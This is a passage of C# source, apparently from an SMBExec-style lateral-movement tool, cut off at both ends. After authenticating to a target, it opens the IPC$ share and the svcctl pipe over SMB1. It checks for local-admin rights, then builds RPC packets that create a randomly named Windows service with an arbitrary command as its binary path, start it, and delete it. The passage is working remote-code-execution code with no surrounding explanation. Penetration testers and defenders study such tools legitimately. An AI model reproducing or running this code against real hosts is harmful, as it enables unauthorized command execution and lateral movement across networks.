output.AppendLine("Unable to Authenticate to Target.");
Console.WriteLine(output.ToString());
}
}
if (debug) { output.AppendLine(String.Format("Login Status: {0}", Login_Successful)); }
if (Login_Successful)
{
byte[] SMBExec_Command;
byte[] SMB_Path_Bytes;
string SMB_Path = "\\\\" + Target + "\\IPC$";
if (ForceSMB1)
{
SMB_Path_Bytes = Encoding.UTF8.GetBytes(SMB_Path).Concat(new byte[] { 0x00 }).ToArray();
}
else
{
SMB_Path_Bytes = Encoding.Unicode.GetBytes(SMB_Path);
}
byte[] SMB_named_pipe_UUID = { 0x81, 0xbb, 0x7a, 0x36, 0x44, 0x98, 0xf1, 0x35, 0xad, 0x32, 0x98, 0xf0, 0x38, 0x00, 0x10, 0x03 };
byte[] SMB_Service_Bytes;
string SMB_Service = null;
if (string.IsNullOrEmpty(ServiceName))
{
const string chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
var rand = new Random();
SMB_Service = new string(Enumerable.Repeat(chars, 20).Select(s => s[rand.Next(s.Length)]).ToArray());
SMB_Service_Bytes = Encoding.Unicode.GetBytes(SMB_Service).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
}
else
{
SMB_Service = ServiceName;
SMB_Service_Bytes = Encoding.Unicode.GetBytes(SMB_Service);
if (Convert.ToBoolean(SMB_Service.Length % 2))
{
SMB_Service_Bytes = SMB_Service_Bytes.Concat(new byte[] { 0x00, 0x00 }).ToArray();
}
else
{
SMB_Service_Bytes = SMB_Service_Bytes.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
}
}
if (debug) { output.AppendLine(String.Format("Service Name is {0}", SMB_Service)); }
byte[] SMB_Service_Length = BitConverter.GetBytes(SMB_Service.Length + 1);
if (ComSpec)
{
if (debug) { output.AppendLine("Appending %COMSPEC% /C"); }
command = "%COMSPEC% /C \"" + command + "\"";
}
byte[] commandBytes = Encoding.UTF8.GetBytes(command);
List<byte> SMBExec_Command_List = new List<byte>();
foreach (byte commandByte in commandBytes)
{
SMBExec_Command_List.Add(commandByte);
SMBExec_Command_List.Add(0x00);
}
byte[] SMBExec_Command_Init = SMBExec_Command_List.ToArray();
if (Convert.ToBoolean(command.Length % 2))
{
SMBExec_Command = SMBExec_Command_Init.Concat(new byte[] { 0x00, 0x00 }).ToArray();
}
else
{
SMBExec_Command = SMBExec_Command_Init.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
}
byte[] SMBExec_Command_Length_bytes = BitConverter.GetBytes(SMBExec_Command.Length / 2);
int SMB_Split_Index = 4256;
int SMB_Signing_Counter = 0;
byte[] SMB_Tree_ID = new byte[2];
string SMB_Client_Stage_Next = "";
if (ForceSMB1)
{
SMBClientStage = "TreeConnectAndXRequest";
while (SMBClientStage != "exit" && SMBExec_Failed == false)
{
if (debug) { output.AppendLine(String.Format("Current Stage {0}", SMBClientStage)); }
switch (SMBClientStage)
{
case "TreeConnectAndXRequest":
{
Packet_SMB_Header = new OrderedDictionary();
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x75 }, new byte[] { 0x18 }, new byte[] { 0x01, 0x48 }, new byte[] { 0xff, 0xff }, Process_ID_Bytes, SMB_User_ID);
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
SMB_Signing_Counter = 2;
SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
}
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
Packet_SMB_Data = SMBExec.SMBTreeConnectAndXRequest(SMB_Path_Bytes);
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
if (SMB_Signing)
{
SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).ToArray();
SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
SMB_Signature2 = Utilities.GetByteRange(SMB_Signature, 0, 7);
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature2;
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "CreateAndXRequest";
}
break;
case "CreateAndXRequest":
{
SMB_Named_Pipe_Bytes = new byte[] { 0x5c, 0x73, 0x76, 0x63, 0x63, 0x74, 0x6c, 0x00 }; //svcctl
SMB_Tree_ID = Utilities.GetByteRange(SMBClientReceive, 28, 29);
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0xa2 }, new byte[] { 0x18 }, new byte[] { 0x02, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
SMB_Signing_Counter += 2;
SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
}
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
Packet_SMB_Data = SMBExec.SMBNTCreateAndXRequest(SMB_Named_Pipe_Bytes);
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
if (SMB_Signing)
{
SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).ToArray();
SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
SMB_Signature2 = Utilities.GetByteRange(SMB_Signature, 0, 7);
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature2;
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "RPCBind";
}
break;
case "RPCBind":
{
SMB_FID = Utilities.GetByteRange(SMBClientReceive, 42, 43);
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
SMB_Signing_Counter += 2;
SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
}
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
Packet_RPC_Data = SMBExec.RPCBind(1, new byte[] { 0xb8, 0x10 }, new byte[] { 0x01 }, new byte[] { 0x00, 0x00 }, SMB_named_pipe_UUID, new byte[] { 0x02, 0x00 });
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length);
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
int RPC_Data_Length = SMB_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "ReadAndXRequest";
SMB_Client_Stage_Next = "OpenSCManagerW";
}
break;
case "ReadAndXRequest":
{
Thread.Sleep(sleep * 1000);
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2e }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
SMB_Signing_Counter += 2;
SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
}
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
Packet_SMB_Data = SMBExec.SMBReadAndXRequest(SMB_FID);
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
if (SMB_Signing)
{
SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).ToArray();
SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
SMB_Signature2 = Utilities.GetByteRange(SMB_Signature, 0, 7);
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature2;
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = SMB_Client_Stage_Next;
}
break;
case "OpenSCManagerW":
{
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
SMB_Signing_Counter += 2;
SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
}
Packet_SCM_Data = SMBExec.SCMOpenSCManagerW(SMB_Service_Bytes, SMB_Service_Length);
SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0f, 0x00 }, null);
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, (RPC_Data.Length + SCM_Data.Length));
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
int RPC_Data_Length = SMB_Data.Length + SCM_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "ReadAndXRequest";
SMB_Client_Stage_Next = "CheckAccess";
}
break;
case "CheckAccess":
{
if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 108, 111)) == "00-00-00-00" && BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 88, 107)) != "00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00")
{
SMB_Service_Manager_Context_Handle = Utilities.GetByteRange(SMBClientReceive, 88, 107);
if (SMB_execute)
{
Packet_SCM_Data = SMBExec.SCMCreateServiceW(SMB_Service_Manager_Context_Handle, SMB_Service_Bytes, SMB_Service_Length, SMBExec_Command, SMBExec_Command_Length_bytes);
SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
if (SCM_Data.Length < SMB_Split_Index)
{
SMBClientStage = "CreateServiceW";
}
else
{
SMBClientStage = "CreateServiceW_First";
}
}
else
{
output.AppendLine(String.Format("{0} is a local administrator on {1}", Output_Username, Target));
SMB_Close_Service_Handle_Stage = 2;
SMBClientStage = "CloseServiceHandle";
}
}
else if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 108, 111)) == "05-00-00-00")
{
output.AppendLine(String.Format("{0} is not a local administrator or does not have the required privileges on {1}", Output_Username, Target));
Console.WriteLine(output.ToString());
}
else
{
if (debug)
{
output.AppendLine(BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 108, 111)));
output.AppendLine(BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 88, 107)));
}
output.AppendLine(String.Format("Something went wrong with {0}", Target));
Console.WriteLine(output.ToString());
}
}
break;
case "CreateServiceW":
{
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
SMB_Signing_Counter += 2;
SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
}
Packet_SCM_Data = SMBExec.SCMCreateServiceW(SMB_Service_Manager_Context_Handle, SMB_Service_Bytes, SMB_Service_Length, SMBExec_Command, SMBExec_Command_Length_bytes);
SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, null);
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length + SCM_Data.Length);
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
int RPC_Data_Length = SMB_Data.Length + SCM_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "ReadAndXRequest";
SMB_Client_Stage_Next = "StartServiceW";
}
break;
case "CreateServiceW_First":
{
SMB_Split_Stage_final = Math.Ceiling((double)SCM_Data.Length / SMB_Split_Index);
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
SMB_Signing_Counter += 2;
SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
}
byte[] SCM_Data_First = Utilities.GetByteRange(SCM_Data, 0, SMB_Split_Index - 1);
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x01 }, 0, 0, 0, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_Data_First);
Packet_RPC_Data["RPCRequest_AllocHint"] = BitConverter.GetBytes(SCM_Data.Length);
SMB_Split_Index_Tracker = SMB_Split_Index;
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length);
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
int RPC_Data_Length = SMB_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
if (SMB_Split_Stage_final <= 2)
{
SMBClientStage = "CreateServiceW_Last";
}
else
{
SMB_Split_Stage = 2;
SMBClientStage = "CreateServiceW_Middle";
}
}
break;
case "CreateServiceW_Middle":
{
SMB_Split_Stage++;
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
SMB_Signing_Counter += 2;
SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
}
byte[] SCM_Data_Middle = Utilities.GetByteRange(SCM_Data, SMB_Split_Index_Tracker, SMB_Split_Index_Tracker + SMB_Split_Index - 1);
SMB_Split_Index_Tracker += SMB_Split_Index;
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x00 }, 0, 0, 0, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_Data_Middle);
Packet_RPC_Data["RPCRequest_AllocHint"] = BitConverter.GetBytes(SCM_Data.Length - SMB_Split_Index_Tracker + SMB_Split_Index);
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length);
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
int RPC_Data_Length = SMB_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
if (SMB_Split_Stage >= SMB_Split_Stage_final)
{
SMBClientStage = "CreateServiceW_Last";
}
else
{
SMBClientStage = "CreateServiceW_Middle";
}
}
break;
case "CreateServiceW_Last":
{
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x48 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
SMB_Signing_Counter += 2;
SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
}
byte[] SCM_Data_Last = Utilities.GetByteRange(SCM_Data, SMB_Split_Index_Tracker, SCM_Data.Length);
SMB_Split_Index_Tracker += SMB_Split_Index;
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x02 }, 0, 0, 0, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_Data_Last);
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length);
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
int RPC_Data_Length = SMB_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "ReadAndXRequest";
SMB_Client_Stage_Next = "StartServiceW";
}
break;
case "StartServiceW":
{
if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 112, 115)) == "00-00-00-00")
{
SMB_Service_Context_Handle = Utilities.GetByteRange(SMBClientReceive, 92, 111);
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
SMB_Signing_Counter += 2;
SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
}
Packet_SCM_Data = SMBExec.SCMStartServiceW(SMB_Service_Context_Handle);
SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x03, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x13, 0x00 }, null);
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length + SCM_Data.Length);
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
int RPC_Data_Length = SMB_Data.Length + SCM_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "ReadAndXRequest";
SMB_Client_Stage_Next = "DeleteServiceW";
}
else if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 112, 115)) == "31-04-00-00")
{
output.AppendLine(String.Format("Service {0} creation failed on {1}", SMB_Service, Target));
Console.WriteLine(output.ToString());
}
else
{
output.AppendLine("Service Creation Fault Context Mismatch");
Console.WriteLine(output.ToString());
}
}
break;
case "DeleteServiceW":
{
if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 88, 91)) == "1D-04-00-00")
{
if (debug) { output.AppendLine(String.Format("Command Executed with ServiceName: {0} on {1}", SMB_Service, Target)); }
}
else if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 88, 91)) == "02-00-00-00")
{
SMBExec_Failed = true;
if (debug) { output.AppendLine(String.Format("Service {0} failed to start on {1}", SMB_Service, Target)); }
}
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
SMB_Signing_Counter += 2;
SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
}
Packet_SCM_Data = SMBExec.SCMDeleteServiceW(SMB_Service_Context_Handle);
SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x04, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x02, 0x00 }, null);
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length + SCM_Data.Length);
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
int RPC_Data_Length = SMB_Data.Length + SCM_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "ReadAndXRequest";
SMB_Client_Stage_Next = "CloseServiceHandle";
SMB_Close_Service_Handle_Stage = 1;
}
break;
case "CloseServiceHandle":
{
Packet_SCM_Data = new OrderedDictionary();
if (SMB_Close_Service_Handle_Stage == 1)
{
if (debug) { output.AppendLine(String.Format("Service {0} deleted on {1}", SMB_Service, Target)); }
Service_Deleted = true;
SMB_Close_Service_Handle_Stage++;
Packet_SCM_Data = SMBExec.SCMCloseServiceHandle(SMB_Service_Context_Handle);
}
else
{
SMBClientStage = "CloseRequest";
Packet_SCM_Data = SMBExec.SCMCloseServiceHandle(SMB_Service_Manager_Context_Handle);
}
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
if (SMB_Signing)
